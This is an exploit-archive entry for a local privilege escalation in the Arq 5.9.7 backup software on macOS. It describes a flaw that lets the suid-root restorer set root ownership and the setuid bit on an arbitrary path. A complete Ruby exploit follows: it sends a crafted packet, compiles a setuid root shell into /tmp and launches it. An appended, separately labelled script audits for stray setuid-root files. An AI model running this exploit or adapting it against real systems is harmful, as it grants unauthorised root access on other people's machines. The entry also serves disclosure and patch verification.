Arq 5.9.7 - Local Privilege Escalation

Author: Mark Wadham
Platform: macos
Release date: 2017-12-06

=begin
As well as the other bugs affecting Arq <= 5.9.6 there is also another issue
with the suid-root restorer binaries in Arq for Mac. There are three of them
and they are used to execute restores of backed up files from the various
cloud providers.

After reversing the inter-app protocol I discovered that the path to the
restorer binary was specified as part of the data packet sent by the UI. After
receiving this, the restorer binaries then set +s and root ownership on this
path. This means we can specify an arbitrary path which will receive +s and root
ownership.

This issue is fixed in Arq 5.10.
=end

#!/usr/bin/env ruby

##################################################################
###### Arq <= 5.9.7 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html               ######
##################################################################

s = File.stat("/Applications/Arq.app/Contents/Resources/standardrestorer")

if s.mode != 0104755 or s.uid != 0
  puts "Not vulnerable - standardrestorer is not suid root."
  exit 1
end

binary_target = "/tmp/arq_597_exp"

d = "\x01\x00\x00\x00\x00\x00\x00\x00"
e = "\x00\x00\x00\x00\x03"
z = "0000"
target = sprintf("%s%s-%s-%s-%s-%s%s%s", z,z,z,z,z,z,z,z)
plist = "<plist version=\"1.0\"><dict><\/dict><\/plist>"
backup_set = "0" * 40
hmac = "0" * 40

payload = sprintf(
  "%s%s%s%s\$%s%s\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00" +
  "\x00\x00\x00\x00\x00\x09\x00\x00\x02\xd0\x96\x82\xef\xd8\x00\x00\x00\x00" +
  "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x08\x30\x2e\x30" +
  "\x30\x30\x30\x30\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
  "\x00\x00\x00\x00\x00\x00\x00%s%s%s\x28%s\x01\x00\x00\x00%s\x00\x00\x00%s" +
  "\x00\x00\x00\x00\x16\x00\x00\x00\x02%s\x28%s\x01\x00\x00\x00%s\x00\x00" +
  "\x00%s\x00\x00\x00\x00\x00\x00\x00\x01\xf5\x00\x00\x00\x00\x00\x00\x00" +
  "\x14\x00%s\x00\x00\x00\x00\x03%s\x0a",
    d, binary_target.length.chr, binary_target,
    d, target,
    d, plist.length.chr, plist,
    d, backup_set,
    d, d, d, hmac,
    d, d, d, e * 10
  )

shellcode = "#include <unistd.h>\nint main()\n{ setuid(0);setgid(0);"+
  "execl(\"/bin/bash\",\"bash\",\"-c\",\"rm -f #{binary_target};/bin/bash\","+
  "NULL);return 0; }"

IO.popen("gcc -xc -o #{binary_target} -", "r+") do |io|
  io.write(shellcode)
  io.close
end

IO.popen("/Applications/Arq.app/Contents/Resources/standardrestorer " +
  "2>/dev/null", "r+") do |io|
  io.getc && io.write(payload)
end

timeout=3
i=0

while (s = File.stat(binary_target)) && (s.mode != 0104755 or s.uid != 0)
  sleep 0.1
  i += 1

  if i >= (timeout * 10)
    break
  end
end

if s.mode == 0104755 and s.uid == 0
  system(binary_target)
  exit 0
end

puts "exploit failed"
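A defensive counterpart to the bug described in the header comment, added here as an example and not part of the original exploit or of Arq: it walks the given directories for files that carry the setuid bit and are owned by root, and reports any that sit outside an allowlist of directories where setuid helpers are expected. Run against /tmp and /Applications it surfaces both the artifact this bug produces (a setuid-root file at an arbitrary path) and the still-setuid restorer binaries of an unpatched install; the allowlist and the default roots are assumptions to adjust to your own baseline.

```ruby
#!/usr/bin/env ruby
# Added audit script (not from the advisory above): find setuid-root files
# and flag those outside the directories where such helpers normally live.
require 'find'

# Assumed baseline of directories where setuid-root binaries are expected on
# macOS; anything found elsewhere (e.g. /tmp, /Applications) is reported.
EXPECTED_SUID_DIRS = %w[/usr/bin /usr/sbin /usr/libexec /bin /sbin].freeze

S_ISUID = 0o4000

# True when +stat+ describes a regular file with the setuid bit set. With
# +require_root+ the file must also be owned by uid 0, the dangerous case.
def suid_root?(stat, require_root: true)
  return false unless stat.file?
  return false if (stat.mode & S_ISUID).zero?
  !require_root || stat.uid.zero?
end

# Walk +roots+ and return every path whose lstat satisfies suid_root?.
# lstat is used so a symlink to a legitimate helper is not itself reported.
def find_suid(roots, require_root: true)
  hits = []
  roots.each do |root|
    next unless File.exist?(root)
    Find.find(root) do |path|
      begin
        st = File.lstat(path)
      rescue SystemCallError
        next
      end
      hits << path if suid_root?(st, require_root: require_root)
    end
  end
  hits
end

# Split hits into [expected, suspicious] by their directory prefix.
def classify(paths, expected_dirs = EXPECTED_SUID_DIRS)
  paths.partition { |p| expected_dirs.any? { |d| p.start_with?(d + '/') } }
end

if __FILE__ == $0 && !ARGV.empty?
  # Usage: ruby suid_audit.rb /tmp /Applications
  _expected, suspicious = classify(find_suid(ARGV))
  suspicious.each { |p| puts "suspicious setuid-root file: #{p}" }
  puts "no setuid-root files outside expected directories" if suspicious.empty?
end
```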